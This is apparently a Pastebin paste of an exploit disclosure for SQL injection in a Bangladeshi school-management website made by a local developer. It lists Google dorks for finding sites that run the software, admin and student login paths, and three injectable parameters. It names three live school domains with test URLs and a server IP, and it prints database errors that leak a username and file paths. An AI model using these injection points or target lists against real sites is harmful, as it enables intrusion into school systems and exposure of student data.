API tools faq
paste
KingSkrupellos

Sikder Computer Center Mathbaria Bangladesh SQL Injection

KingSkrupellos
Jan 7th, 2019
277
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.51 KB | None | 0 0
raw download clone embed print report
  1. #####################################################################
  2.  
  3. # Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/01/2019
  7. # Vendor Homepage : sikdercomputer.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Design & Developed by Sikder Computer, Mathbaria'' site:edu.bd
  12. intext:''Powered by Sikder Computer'' site:edu.bd
  13. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  14. Special Elements used in an SQL Command ('SQL Injection') ]
  15. # Cyberizm Exploit Reference Link :
  16. cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html
  17. # CXSecurity Exploit Reference Link :
  18. cxsecurity.com/issue/WLB-2019010044
  19.  
  20. #####################################################################
  21.  
  22. # Admin/Teacher/Student Panel Login Path :
  23. ***************************************
  24.  
  25. /PATH/admin/index
  26. /PATH/students_panel/index
  27.  
  28. # SQL Injection Exploit :
  29. ***********************
  30.  
  31. [PATH]/view_gallery_meetings?page=[SQL Injection]
  32.  
  33. [PATH]/current_success_students_info?id=[SQL Injection]
  34.  
  35. [PATH]/ex_success_students_info?id=[SQL Injection]
  36.  
  37. #####################################################################
  38.  
  39. # Example Vulnerable Sites =>
  40. *****************************
  41.  
  42. Note : (67.23.238.179) => There are 1,107 domains hosted on this server.
  43.  
  44. [+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27
  45.  
  46. [+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27
  47.  
  48. [+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27
  49.  
  50. #####################################################################
  51.  
  52. # SQL Database Error :
  53. *********************
  54.  
  55. Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost'
  56. (using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3
  57.  
  58. Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in
  59. /home/nalivimssedu/public_html/nali/admin/config/config.php on line 5
  60. Couldn't Connect to the database ***No database found ***
  61.  
  62. Warning: mysql_query(): Access denied for user ''@'localhost'
  63. (using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19
  64.  
  65. #####################################################################
  66.  
  67. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  68.  
  69. #####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!